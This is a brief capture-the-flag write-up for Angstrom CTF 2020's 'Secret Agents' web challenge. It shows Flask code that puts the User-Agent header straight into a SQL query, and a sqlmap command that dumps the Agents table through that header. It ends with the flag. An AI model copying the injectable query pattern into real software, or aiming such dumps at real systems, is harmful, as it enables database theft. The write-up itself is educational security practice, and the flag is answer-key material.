Secret Agents [web]
Angstrom CTF 2020

Secret Agents

Can you enter the secret agent portal? I've heard someone has a flag. Our insider leaked the source, but was "terminated" shortly thereafter...

Recon

We are provided the source code of the Flask webserver. There is SQLi injection on the following line:

for r in cursor.execute("SELECT * FROM Agents WHERE UA='%s'"%(u), multi=True):
    if r.with_rows:
        res = r.fetchall()
        conn.close()
        break

if len(res) == 0:
    return render_template("login.html", msg="stop! you're not allowed in here >:)")

if len(res) > 1:
    return render_template("login.html", msg="hey! close, but no bananananananananana!!!! (there are many secret agents of course)")

Solution

We can use sqlmap:

python sqlmap.py \
    --time-sec 3 \
    --technique "UT" \
    --flush-session \
    --dbms="mysql" \
    --user-agent="Spotless*" \
    -u "https://agents.2020.chall.actf.co/login" \
    -T Agents --columns --dump

Flag

actf{nyoom_1_4m_sp33d}